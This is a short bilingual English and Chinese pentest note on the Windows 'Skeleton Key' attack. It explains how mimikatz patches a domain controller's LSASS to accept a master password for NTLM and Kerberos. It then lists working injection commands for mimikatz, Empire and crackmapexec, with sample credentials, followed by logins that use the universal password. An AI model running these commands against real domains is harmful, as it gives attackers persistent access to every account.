The Skeleton Key attack tampers both the authentication methods. During NTLM authentication the hash of the master password which is injected in the LASS process will not be matched with the SAM database. Although it will be matched with the Skeleton Key hash. Therefore, completing the authentication. Kerberos encryption will also be downgraded to an algorithm that doesn’t support salt (RC4_HMAC_MD5) and the hash retrieved from the active directory will be replaced with the Skeleton Key hash. The master password hash will be validated server-side. This will lead to successful authentication for Kerberos and NTLM methods.

mimikatz将Skeleton Key hash注入域控机器LSASS进程,并劫持NTLM认证和Kerberos认证过程:

  1. 对于NTLM认证,如果是Skeleton Key hash,则不会查询SAM database中的Hash与其比较
  2. 对于Kerberos认证,我的理解是这样的:降级kerberos加密方法为RC4_HMAC_MD5,从而在第一步request TGT的时候,使用不带salt的NT Hash(RC4_HMAC-MD5)来加密timestamp;在LSASS进程从AD中查询对应用户的hash来解密timestamp时,替换hash为Skeleton Key hash,从而验证用户成功,返回TGT。

由于此方法是注入DC LSA进程,因此需要Domain Admins权限,且重启后失效

  1. # 注入skeleton key
  2. ## mimikatz
  3. privilege::debug
  4. misc::skeleton
  5. ## empire
  6. usemodule persistence/misc/skeleton_key*
  7. execute
  8. ## crackmapexec
  9. crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' -M mimikatz -o COMMAND='misc::skeleton'
  12. # 使用skeleton password作为万能密码,任何用户都能验证通过
  13. net use R: \\WIN-S0V7KMTVLD2\admin$ /user:Administrator mimikatz
  14. rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab

原文

【Windows域】Skeleton Key